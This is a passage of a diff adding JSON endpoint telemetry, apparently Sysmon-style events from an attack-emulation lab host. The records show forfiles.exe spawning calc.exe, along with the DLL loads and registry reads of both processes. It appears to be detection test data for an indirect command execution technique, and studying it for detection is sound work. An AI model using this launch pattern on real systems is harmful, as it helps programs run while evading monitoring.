"timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": 
"C:\\Windows\\System32\\user32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021120000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4500, + 
"process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": 
"C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574021160000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\calc.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "forfiles.exe", + "parent_process_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 2616, + "ppid": 4500, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "create", + "timestamp": 131883574021320000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "calc.exe", + "image_path": "C:\\Windows\\System32\\calc.exe", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + 
"event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + 
"pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": 
"C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021340000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021439984, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + 
"image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021520000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + 
"process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021700000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ieframe.dll", + "image_path": "C:\\Windows\\System32\\ieframe.dll", + "pid": 
2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 
131883574021790016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021880000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021880000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "mlang.dll", + "image_path": "C:\\Windows\\System32\\mlang.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574021970000, + 
"unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883574021970000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.AppDefaults.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", + "pid": 2616, 
+ "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", + "registry_value": "ApplicationAssociationToasts", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + 